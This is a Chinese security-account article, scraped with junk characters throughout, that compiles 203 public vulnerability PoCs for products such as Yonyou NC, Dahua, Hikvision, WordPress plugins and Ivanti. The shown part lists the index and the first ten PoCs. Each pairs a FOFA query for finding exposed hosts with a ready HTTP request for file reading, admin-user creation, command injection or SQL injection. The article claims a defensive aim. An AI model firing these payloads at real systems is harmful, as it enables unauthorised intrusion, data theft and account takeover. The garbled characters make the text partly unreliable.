互联网公开漏洞整理202309-202406
. J6 W+ M; }" p8 |道一安全 2024-06-05 07:41 北京
% a, x, S+ T8 c$ i7 \, }以下文章来源于网络安全新视界 ,作者网络安全新视界6 c: h3 ~" F& I. ?: _- H
0 X8 p) k& t; K: ^) ]* m, Z! o8 T发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。% Y. W1 ]$ @- p) R' O
. Y4 `* M8 R3 e) x1 k漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。+ l1 [: z7 i8 P6 T+ H" R3 G
4 P' E. ~- S3 @5 w安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
% K! Y5 f: z% Y4 R6 T& P9 _) f9 O6 y9 K- o
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
( g$ B- v5 n, j. @( }5 e' V
" S4 G G+ [$ F4 {7 j( n- Q合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。) o- H! T1 O/ U0 I# I
/ n- t' d$ i! \
5 n* E) {$ Z9 e7 x6 `
声明' D! s2 o+ e: v" f# o) S6 V" B
: o# L( C+ f/ f, C) t4 W为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
0 P6 d% q7 e, i9 B) W+ M! s, K7 f8 D' G
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
7 _* {& Z8 @0 V+ }# {. v4 s3 _+ R/ c4 j( p
$ Y# s! S8 m" g9 ^8 S/ |! _0 u8 A( l6 L0 G. j6 R* _7 {
目录) ~; @( F/ W, `8 W" V8 e o6 w \: [, N
9 a' d5 a7 t+ v1 J/ y
01
+ b& e. T1 i4 ]1 e
' [! _1 K" ~7 X0 f1 C1. StarRocks MPP数据库未授权访问
7 U' v. U% }+ g! B7 z' A' Q- ~2. Casdoor系统static任意文件读取
; g; W+ M' f$ }( l3. EasyCVR智能边缘网关 userlist 信息泄漏! I* T2 k2 a3 o
4. EasyCVR视频管理平台存在任意用户添加
9 r8 |3 T' R* Q4 h5. NUUO NVR 视频存储管理设备远程命令执行( y _9 g6 W6 w& C- O/ r
6. 深信服 NGAF 任意文件读取
n3 J5 c, b+ B: U/ x7. 鸿运主动安全监控云平台任意文件下载
- E% ^: c; o' U4 V0 e: O8. 斐讯 Phicomm 路由器RCE
- |; ]3 A% l k1 {; g9. 稻壳CMS keyword 未授权SQL注入
+ ^" l4 ^& `$ K10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
- ]) j A# h1 o' y) d6 q: q11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入; I* E* t a8 B* J; O( V4 X
12. Jorani < 1.0.2 远程命令执行
7 d0 G6 Y. [' I# o5 ]13. 红帆iOffice ioFileDown任意文件读取: I' d7 N' C4 y
14. 华夏ERP(jshERP)敏感信息泄露6 u& z. d+ r/ j* h; }; [3 w& Z
15. 华夏ERP getAllList信息泄露
; W4 U3 K7 I; N' s2 n1 E8 i; i16. 红帆HFOffice医微云SQL注入
; Z+ x5 R& r& u2 |' Z. S17. 大华 DSS itcBulletin SQL 注入
7 F& r/ w& Z' G3 v% }6 \; O18. 大华 DSS 数字监控系统 user_edit.action 信息泄露/ t& i6 G% Z F5 s; X, X! v# S
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
6 M# r) ?. x9 q+ B20. 大华ICC智能物联综合管理平台任意文件读取
# k8 R* N2 K7 |- Z8 y0 g, H21. 大华ICC智能物联综合管理平台random远程代码执行
# ]( C7 ?( Z) R2 v22. 大华ICC智能物联综合管理平台 log4j远程代码执行
9 |7 o7 ~( W7 N# [( I: F0 y1 q23. 大华ICC智能物联综合管理平台 fastjson远程代码执行1 E/ D& h4 v8 }+ S
24. 用友NC 6.5 accept.jsp任意文件上传
. p( g$ l# S/ q( q' G25. 用友NC registerServlet JNDI 远程代码执行& r8 _: M# Y4 t+ O- ?8 }4 X
26. 用友NC linkVoucher SQL注入
( q" U# Y2 i H8 n, x27. 用友 NC showcontent SQL注入( h# a" O/ ~* [. ~
28. 用友NC grouptemplet 任意文件上传
5 r" J- p; r- i) B29. 用友NC down/bill SQL注入
7 W" f% ~( M3 _) M: u& b! Z2 d30. 用友NC importPml SQL注入
0 f/ x: m K8 c8 R" [* K7 S( e31. 用友NC runStateServlet SQL注入) o, i6 P2 E3 V: g- G0 x) n: B" W
32. 用友NC complainbilldetail SQL注入
/ [- B9 j# I' g( e, Q' L# P33. 用友NC downTax/download SQL注入
) j& G, d; v1 {; `; b# _34. 用友NC warningDetailInfo接口SQL注入
& a" d- Q/ E2 W6 P35. 用友NC-Cloud importhttpscer任意文件上传. c2 _% H; {7 S! b4 R) }9 \4 V0 q* B6 ^
36. 用友NC-Cloud soapFormat XXE, V5 A7 q! B9 T: {3 q7 b, D/ e
37. 用友NC-Cloud IUpdateService XXE: X4 {& |, K- U9 \, h0 i- M8 U
38. 用友U8 Cloud smartweb2.RPC.d XXE1 F( I6 x1 n% G0 D; X
39. 用友U8 Cloud RegisterServlet SQL注入
- [: q% c! C: _0 a" |40. 用友U8-Cloud XChangeServlet XXE6 U% a0 |6 A7 o: J1 J
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
; v1 e' N! Y* F( }42. 用友GRP-U8 SmartUpload01 文件上传; y9 s! y8 E6 H9 R- w+ {( ]
43. 用友GRP-U8 userInfoWeb SQL注入致RCE8 u$ B: e3 n! q0 H( G2 o
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
0 B5 k! l Q& h45. 用友GRP-U8 ufgovbank XXE( P$ L! Z7 L- |! J! S2 m) t" k4 V7 O+ r
46. 用友GRP-U8 sqcxIndex.jsp SQL注入7 U; F6 z& \. J8 ~$ B
47. 用友GRP A++Cloud 政府财务云 任意文件读取
! X( Z- \+ O2 O( G1 V48. 用友U8 CRM swfupload 任意文件上传 `/ [0 c" w3 S+ ~% R! f: K* |
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
0 u: Z& \; j8 E0 \5 z( l50. QDocs Smart School 6.4.1 filterRecords SQL注入
. u- l+ v9 h4 x9 Z51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入( c8 Z9 _. i9 w! E; _' F
52. 泛微E-Office json_common.php sql注入* G$ B) A) Y/ D y- b+ w2 O
53. 迪普 DPTech VPN Service 任意文件上传
) u" k' N4 W' y) P& a2 r2 x6 N8 M54. 畅捷通T+ getstorewarehousebystore 远程代码执行
2 y# P0 u, f3 m55. 畅捷通T+ getdecallusers信息泄露( j# a ~$ i! e& `9 \
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
+ a+ ]+ c4 O/ R1 M6 M57. 畅捷通T+ keyEdit.aspx SQL注入
6 J Y. j9 \8 f+ T# b- Z8 o58. 畅捷通T+ KeyInfoList.aspx sql注入
9 {/ Q9 T' ~6 }7 v59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行* a9 o/ s( X9 v8 _. \
60. 百卓Smart管理平台 importexport.php SQL注入
Q1 l; Q1 [, B2 x7 \8 _$ i61. 浙大恩特客户资源管理系统 fileupload 任意文件上传% L+ P% _3 c( B4 y
62. IP-guard WebServer 远程命令执行3 i6 R7 ?+ E* Y. Q3 G( B9 h
63. IP-guard WebServer任意文件读取% y+ ^7 y7 D+ W6 ^+ s" q- V! W
64. 捷诚管理信息系统CWSFinanceCommon SQL注入& u+ l. W5 |3 M
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过+ g# e, K; q. q) e. l
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
2 \0 ~' D. n' V/ z6 h& R2 ^6 G7 D67. 万户ezOFFICE wpsservlet任意文件上传, K S4 [( X9 p& y: ~* F* @
68. 万户ezOFFICE wf_printnum.jsp SQL注入& ?, z& w5 E* p6 C! O
69. 万户 ezOFFICE contract_gd.jsp SQL注入) j7 l7 W/ z( ]
70. 万户ezEIP success 命令执行. M' |* C$ u9 x7 _3 v: h
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入, n1 h& b- A4 }; u7 x$ I+ Y6 ]: `
72. 致远OA getAjaxDataServlet XXE
! x% c' ~/ B/ R73. GeoServer wms远程代码执行
7 I2 n* o& `6 O74. 致远M3-server 6_1sp1 反序列化RCE
* I" `2 t8 w) h75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
( z0 K+ Y: R. B1 ]2 a: }76. 新开普掌上校园服务管理平台service.action远程命令执行
, P6 N6 ?) T9 }77. F22服装管理软件系统UploadHandler.ashx任意文件上传
7 }/ B/ @7 e; v5 f& t78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传- E! P ~: u* J0 U- x4 Q
79. BYTEVALUE 百为流控路由器远程命令执行
# L* C% W, [4 z- i, H8 E+ ?80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传/ v& }0 [9 ~) H+ l) w; A( k
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露$ m1 M9 s9 s2 L
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行7 T O6 [. B4 ^' b* D
83. JeecgBoot testConnection 远程命令执行
0 A/ O" ~0 Z4 Y2 A9 M1 a& B84. Jeecg-Boot JimuReport queryFieldBySql 模板注入) s+ d! ]$ C C* O5 }
85. SysAid On-premise< 23.3.36远程代码执行3 e4 Z# _: K$ ~, u
86. 日本tosei自助洗衣机RCE
& V' F- |' S4 i: f; ~( |; A87. 安恒明御安全网关aaa_local_web_preview文件上传
: w7 W- B5 n* M! e" k4 b88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行. ]! d7 k, \$ P: K
89. 致远互联FE协作办公平台editflow_manager存在sql注入- y+ J' K0 f6 i
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行( d6 c3 E$ `6 L& d1 O* q4 _8 L
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
( t* n& m6 b! O2 A92. 海康威视运行管理中心session命令执行
# f [: h" Y) B5 q P93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
: ^8 \% z0 Q0 L( Z% B3 ], k94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传7 \7 f% X9 I+ \* w6 }
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行3 U1 t3 o0 w4 [4 Z: r* D
96. Apache OFBiz 18.12.11 groovy 远程代码执行
, P. h) o. d9 l* [( n97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行2 x2 z5 `: p$ o0 d* X2 B3 `
98. SpiderFlow爬虫平台远程命令执行
3 b1 G/ d6 V- j) }- r% ~99. Ncast盈可视高清智能录播系统busiFacade RCE: L& O( U5 `6 J" N" o* N2 O
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
2 E* w0 H7 b8 P3 U$ ~101. ivanti policy secure-22.6命令注入
c1 h' X, x# x9 O! Z102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
) s7 u! p7 k6 \: K- x V! \' `103. Ivanti Pulse Connect Secure VPN XXE
" J/ ?* S8 y* T( d0 }3 Z104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
8 K1 ?/ z4 t, R, L4 b* q105. SpringBlade v3.2.0 export-user SQL 注入
+ t4 q& o: b( {4 u$ l2 B G106. SpringBlade dict-biz/list SQL 注入
6 y0 ^' f0 l- @! G% N: h' c& l107. SpringBlade tenant/list SQL 注入
u9 L& I j/ F% {7 p& {% I108. D-Tale 3.9.0 SSRF
) w4 @! k# X) A) z+ q& {) T* d* d# s109. Jenkins CLI 任意文件读取1 ]6 j) |4 h3 C' |8 C" |* x
110. Goanywhere MFT 未授权创建管理员7 C9 [+ V3 i$ t3 ]& @
111. WordPress Plugin HTML5 Video Player SQL注入
* B5 u9 ~: ?, G6 c112. WordPress Plugin NotificationX SQL 注入: o8 ^0 Q8 C0 P7 t$ h$ R: g
113. WordPress Automatic 插件任意文件下载和SSRF/ v0 h* d: g' {8 r# t% a! y
114. WordPress MasterStudy LMS插件 SQL注入
+ k. X8 P: B: `0 l, J8 P; {2 \/ V115. WordPress Bricks Builder <= 1.9.6 RCE
) J2 ?! l2 {: k. h$ v116. wordpress js-support-ticket文件上传
& C. U! ?2 \4 n7 ]# U117. WordPress LayerSlider插件SQL注入' M+ n* W2 y2 n% W! i2 t, b
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传$ a7 w- l0 j; I4 }( V& ~
119. 北京百绰智能S20后台sysmanageajax.php sql注入
' Y8 W3 \* n: V+ d9 K120. 北京百绰智能S40管理平台导入web.php任意文件上传4 M! W( M: \5 {! m2 \
121. 北京百绰智能S42管理平台userattestation.php任意文件上传6 ]: m+ x% {8 L5 K2 E$ ?+ c0 Q
122. 北京百绰智能s200管理平台/importexport.php sql注入
6 H6 T4 j6 ^! p( s123. Atlassian Confluence 模板注入代码执行
$ e' q. V2 C* }9 H/ |124. 湖南建研工程质量检测系统任意文件上传
" W" ^0 Y9 @3 w& D- x9 F125. ConnectWise ScreenConnect身份验证绕过
& C! z; ^2 o& S8 a* m' l126. Aiohttp 路径遍历
* {% }0 }9 m+ ?9 }9 r127. 广联达Linkworks DataExchange.ashx XXE
% p+ r; ?: |0 T0 `5 J128. Adobe ColdFusion 反序列化0 }9 M0 w' A! M/ ~0 q
129. Adobe ColdFusion 任意文件读取% V- w: `$ f' Q9 Q# H
130. Laykefu客服系统任意文件上传
0 x" L: Y# o" z& D- p# `131. Mini-Tmall <=20231017 SQL注入
5 D) q$ `+ U* [. z/ R% ~$ ?' @# D132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
& {4 Y: |% L. J- _1 n0 _133. H5 云商城 file.php 文件上传- n) T$ _9 l# `- _. [! I5 Y3 L
134. 网康NS-ASG应用安全网关index.php sql注入
5 u" q" P1 U2 Y1 Q1 i135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入& c& X' [1 `. Q& t, L3 n8 R
136. NextChat cors SSRF+ m; H6 S1 t* o/ W' O+ K. A
137. 福建科立迅通信指挥调度平台down_file.php sql注入
+ Z) f& L h' Q1 q B9 U$ E138. 福建科立讯通信指挥调度平台pwd_update.php sql注入4 h D' U) z f$ }- E B
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
, t5 s1 B2 s+ k! A140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
B4 T) i6 O) P X. t$ |141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
: e% I! B! f* I9 J c5 T- j0 d142. CMSV6车辆监控平台系统中存在弱密码( y/ \3 X! H: y4 |
143. Netis WF2780 v2.1.40144 远程命令执行
" z- h+ [& a" G1 y& D' n144. D-Link nas_sharing.cgi 命令注入
% q' W% |# k2 i5 H" H8 B ~145. Palo Alto Networks PAN-OS GlobalProtect 命令注入/ d y! a: W- P: z7 Y
146. MajorDoMo thumb.php 未授权远程代码执行
/ V6 }0 }! }8 ^- v% x0 N147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
* K: E7 J( t: V148. CrushFTP 认证绕过模板注入
, E+ b! H$ `& i149. AJ-Report开源数据大屏存在远程命令执行
$ ?) V; K7 [) x9 ?' e150. AJ-Report 1.4.0 认证绕过与远程代码执行, X7 _ B+ n( |: o7 ]& @/ @
151. AJ-Report 1.4.1 pageList sql注入0 a; e2 t6 j1 f! ^
152. Progress Kemp LoadMaster 远程命令执行/ M" o5 F1 q. r, g( a3 @
153. gradio任意文件读取
! f1 W( R( ^8 d% ?8 v154. 天维尔消防救援作战调度平台 SQL注入
1 u T% H- i3 A7 _/ U7 w3 @2 n155. 六零导航页 file.php 任意文件上传/ Q) K8 h2 H$ Y7 z' u5 F( `/ ]! A
156. TBK DVR-4104/DVR-4216 操作系统命令注入
2 M+ G' S9 k5 a1 x% m) Q7 V, z157. 美特CRM upload.jsp 任意文件上传2 N7 o6 N& @9 K1 B/ a1 } {
158. Mura-CMS-processAsyncObject存在SQL注入
/ m }7 c* _+ c2 c! v) Q# Z159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传! P2 M ~9 q, z c0 w0 }0 ]/ B
160. Sonatype Nexus Repository 3目录遍历与文件读取
5 p5 }6 y+ Y" e$ [' s1 i161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
2 H" s+ L7 N- X, f h162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
+ r4 B2 U/ y: x6 _% n5 P# u163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
" B5 t1 {0 Y: @0 o4 i1 ~164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传5 Y8 s: x) R. C+ G
165. OrangeHRM 3.3.3 SQL 注入6 E2 q, Y1 R" w; k5 B
166. 中成科信票务管理平台SeatMapHandler SQL注入8 P h+ \. n' }9 c; o8 Q1 w
167. 精益价值管理系统 DownLoad.aspx任意文件读取
& q% Q6 k' V5 ?* q( D, D168. 宏景EHR OutputCode 任意文件读取" @4 B* Y( C5 O G6 M8 R
169. 宏景EHR downlawbase SQL注入
( k) R; y `. {! E170. 宏景EHR DisplayExcelCustomReport 任意文件读取; n5 w: V' Z. S; y6 o$ V3 J, s
171. 通天星CMSV6车载定位监控平台 SQL注入
7 a4 {) ]$ s( t4 \. h. ~7 V+ I172. DT-高清车牌识别摄像机任意文件读取
8 k: H/ o6 \0 x$ O6 |9 H173. Check Point 安全网关任意文件读取
1 `9 C( `, f' S% |174. 金和OA C6 FileDownLoad.aspx 任意文件读取
1 k$ s+ E7 I# K& b& o175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
% H, |, d1 ~0 l: ^5 s4 ~176. 电信网关配置管理系统 rewrite.php 文件上传
# q4 [: c6 ?, b; K177. H3C路由器敏感信息泄露' V h6 a5 h8 \5 h- T4 Y s u
178. H3C校园网自助服务系统-flexfileupload-任意文件上传" T g) o! z9 M B4 D5 O
179. 建文工程管理系统存在任意文件读取7 d6 J! w x5 N; {$ L3 d! F
180. 帮管客 CRM jiliyu SQL注入2 U% x; A" P( n) |& e6 u: c) B, ]
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
: k) v/ Q9 _- L182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
1 U z( O7 O: X" S! ]7 m# B183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
* H4 E, w# v7 H" T0 v3 T$ a184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加$ r( z6 E' {) i3 l B
185. 瑞友天翼应用虚拟化系统SQL注入8 P8 l: `1 D8 x8 d
186. F-logic DataCube3 SQL注入
, D1 F& Q3 l2 h# Q- m5 @4 [# D187. Mura CMS processAsyncObject SQL注入
P5 Z# H7 b0 e. ]% h( j188. 叁体-佳会视频会议 attachment 任意文件读取
9 s# X7 z# b: C7 H189. 蓝网科技临床浏览系统 deleteStudy SQL注入
( w- K1 [6 x& [4 }4 k4 d( |% k0 y7 L8 T190. 短视频矩阵营销系统 poihuoqu 任意文件读取6 V2 D% ~0 _+ }. q/ q3 q4 p5 U. J0 N
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
0 B; v: W! s6 _/ J192. 富通天下外贸ERP UploadEmailAttr 任意文件上传- H$ K, X5 X( [! D* F- A
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
4 C8 \5 e( m0 Q5 ^- O194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
9 R2 X, J- u: I1 L+ l195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
3 u+ {8 {/ t' z# G3 d" K) P R196. 河南省风速科技统一认证平台密码重置
$ \ R9 J0 o3 C$ u0 k197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
2 A/ [. V, Z# ~' Q: o* u198. 阿里云盘 WebDAV 命令注入% d' |2 ]( t9 b% _
199. cockpit系统assetsmanager_upload接口 文件上传
# }/ S! S6 k$ E- V% m9 b9 b# z200. SeaCMS海洋影视管理系统dmku SQL注入( x# z. i* H6 t
201. 方正全媒体新闻采编系统 binary SQL注入+ I1 k, y; _/ r' ~ W
202. 微擎系统 AccountEdit任意文件上传% m% K4 J' H: q: V; d' _
203. 红海云EHR PtFjk 文件上传
9 e8 `5 ?; }4 k; W+ y5 g
& l) d: l* i5 Y: PPOC列表6 s I# f7 Q9 \7 v5 @
& V# c8 E! N5 W% Y0 L02
; ~, k% V2 D/ A- [+ p' D% W" y( s6 j5 G
1. StarRocks MPP数据库未授权访问
5 ~, D' U/ j& v( _5 D, cFOFA :title="StarRocks"$ v+ m+ V! K8 r; B+ M& ^
GET /mem_tracker HTTP/1.10 T& H* |0 c+ c' s- u- H
Host: URL7 T2 \9 z. i& l2 q: i v
" S0 A" s. J8 W C+ b4 K
5 r' m8 i$ {' ]/ K! o2. Casdoor系统static任意文件读取
9 E2 g! B( l* | E. tFOFA :title="Casdoor"/ t! U2 g/ g$ u# d5 Y& d- F: D6 l
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.18 U1 M' l T, ~( R* X4 Q
Host: xx.xx.xx.xx:9999/ n5 ~2 C3 u2 R$ a( n" C1 @) N+ @
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 y; V x3 I" I# h) g( HConnection: close
. \& s9 @, y' I* S2 Q- TAccept: */*
2 R/ Y" n9 B I. |. K" h! QAccept-Language: en$ p. P, A4 x) ?8 Q4 N% x
Accept-Encoding: gzip
6 e& k# @5 ~3 ` X1 o* t" O7 ^( `0 v/ E
5 I: c- k0 u5 v
3. EasyCVR智能边缘网关 userlist 信息泄漏
1 E" H2 ~7 P7 _9 {2 AFOFA :title="EasyCVR"( Q0 O n k/ ~/ A5 ^( Y/ a7 d! z
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1& Y( C6 i& S% {9 U" b
Host: xx.xx.xx.xx! ]3 |) Q( U H5 l. j5 l" b, W% {1 C
) G$ u" ^0 W+ S! O, I3 w# H. B' q5 r5 Q- i) h E+ ^
4. EasyCVR视频管理平台存在任意用户添加- Z1 X* [9 r/ e7 i8 S. M
FOFA :title="EasyCVR"4 @' G8 I& R' b9 t5 |# R" T0 T6 k
2 {1 B2 h8 ]$ y2 Z* T& Gpassword更改为自己的密码md5 `+ f4 Y$ V' @' E/ p: O1 O* ^
POST /api/v1/adduser HTTP/1.1
D7 a/ F6 q. w/ a& I& N3 fHost: your-ip
: s7 Y! _1 F+ q+ K# V, G1 b& fContent-Type: application/x-www-form-urlencoded; charset=UTF-8
- D0 p3 Q1 J \5 R) }2 C5 b; g8 |, l: Y- D6 P- \: k$ T8 z3 a
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1( B) w O# q0 E/ j( S! \! {7 d
# W) r a4 c0 @4 e N6 G
) q/ I0 [6 B! C& A- L q* C
5. NUUO NVR 视频存储管理设备远程命令执行1 j. x+ @# j; V! c0 Q
FOFA:title="Network Video Recorder Login"9 F" q$ H4 } K6 }( _6 K
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1) v1 b" w6 a% }# v# ?" T% i
Host: xx.xx.xx.xx: a" g; W7 H4 g
# ~' ]6 h0 H- ], V5 d2 v$ p3 N5 G& m/ `1 Y. C3 S
6. 深信服 NGAF 任意文件读取
8 Q6 M8 k* i: T* r0 y# W; P8 uFOFA:title="SANGFOR | NGAF". s7 l) j, R$ M' @$ I9 h
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
* U+ C0 n# Q' ~% c* g/ E" J& yHost:
1 z! b7 i+ y* @; }# u
. }6 i' t1 v, m/ q K9 p# n7 e+ M* u: x
7. 鸿运主动安全监控云平台任意文件下载
7 P+ s2 l0 F- f. Q2 P. S, L- nFOFA:body="./open/webApi.html"
, O+ e: W7 J) u" q3 I W7 E- c+ DGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1) E* u n1 y1 k" c9 }
Host:- o0 h- l- N% X
) N$ I" [# @4 q% h
, `1 v; Q# k% ^/ G U, X- A$ O; n8. 斐讯 Phicomm 路由器RCE
5 v: x5 t$ @% O# T0 cFOFA:icon_hash="-1344736688"
6 I/ L3 z4 E& x# f- x9 @ J默认账号admin登录后台后,执行操作
$ G% ]# n8 K% g+ I! p1 X" }! B; hPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1; N1 l0 e j% d7 g6 h
Host: x.x.x.x
* N7 z$ g$ R3 K7 i8 @: `4 JCookie: sysauth=第一步登录获取的cookie
5 [6 [2 N5 P+ k+ Q( `! M. F# sContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
& O& v* o3 w$ W% P' H% y7 zUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
2 s: Y7 b# N+ ]) f
0 g: G' t) Z9 t$ }' J/ N! y------WebKitFormBoundaryxbgjoytz
! w x4 N6 r0 AContent-Disposition: form-data; name="wifiRebootEnablestatus"' X4 h8 A3 C8 I) i
6 n3 y7 F+ {' e {
%s
6 B! T$ B( l; S# J; s& `------WebKitFormBoundaryxbgjoytz) G' i" o& m/ p6 p
Content-Disposition: form-data; name="wifiRebootrange"
0 r+ l( X/ [8 D& _8 J, z8 Z# b( J" m
1 d. U% @( d m- f& c+ h) C$ n t12:00; id;! X7 z* T1 ?8 a. l3 F: p! C! J6 Y
------WebKitFormBoundaryxbgjoytz, Y/ T1 i; L6 n' o- v9 W0 p8 L2 D8 n
Content-Disposition: form-data; name="wifiRebootendrange"
9 P2 i8 {# Y$ u( ^' z4 x8 I: y# l
%s:
& J4 Q" D* A( }. f1 B. s------WebKitFormBoundaryxbgjoytz6 p$ c3 K% l Y4 J5 I: J
Content-Disposition: form-data; name="cururl2"; w; ?! m, l( _0 i8 _
& O& F4 K, H; n
* ~2 e5 P4 B* Z1 h
------WebKitFormBoundaryxbgjoytz-- Z# D( g w6 Q, x/ R$ ~3 ~( @# o" `
$ o: {8 m2 P+ ~
+ u5 d' s! X' M: y8 j2 {9. 稻壳CMS keyword 未授权SQL注入
! }5 p( Z w& ~* G' i+ X/ Q8 f/ J- HFOFA:app="Doccms"* |0 \ C$ P/ M
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.15 N9 ^+ n9 g4 W* S
Host: x.x.x.x6 ?3 ]% H: d$ v. T$ t
+ }) E) P- w9 X
6 [& ^% M4 p7 d' ~: Z/ Ypayload为下列语句的二次Url编码
4 N5 i! n! X6 m2 ]4 f9 [- b+ W8 p' s& P3 s
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#8 N$ G9 l# g! ~% P9 i0 h1 x
1 ~6 s X3 ~( g& n+ n, W
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
9 T9 R5 g( z+ T8 v; ^FOFA:icon_hash="953405444"! B/ W6 s9 [5 H: d$ f) f; @
& _( f4 U) l' A! X$ K6 k文件上传后响应中包含上传文件的路径; A! Q) @7 M* W6 [ A" [
POST /eis/service/api.aspx?action=saveImg HTTP/1.1% L7 c# ~2 @/ r* P7 G5 f9 p
Host: x.x.x.x:xx+ c# B+ a+ [, g+ n0 s9 t) z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.365 E, m0 q R& I# B& @
Content-Length: 1972 K" t: o& j5 ~; F7 M1 ? S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
& a& Q R: w- P' Q8 k9 cAccept-Encoding: gzip, deflate
: s+ T0 k; P$ Z7 [. R, R4 ZAccept-Language: zh-CN,zh;q=0.9
# ^0 K, |* a1 r, m6 zConnection: close
0 x3 N' i1 ?' k: }5 q; \/ R( b. S7 bContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
0 J5 L/ `1 ^0 O9 W
) ~% m! I: q3 }( d: j2 u- D/ h------WebKitFormBoundaryxdgaqmqu# M& x) e o8 k$ i# P) y
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
% \2 t& Z$ H( K8 p/ g9 _Content-Type: text/html4 `; J. n8 w) \* ?
# e- ~" l4 |& z. `jmnqjfdsupxgfidopeixbgsxbf
: u8 Y/ r& x1 G$ J5 _% Q+ z6 ^------WebKitFormBoundaryxdgaqmqu--
4 t$ a$ O& Q1 Q, S: o% i. D ]3 \: V9 D% @) R; @
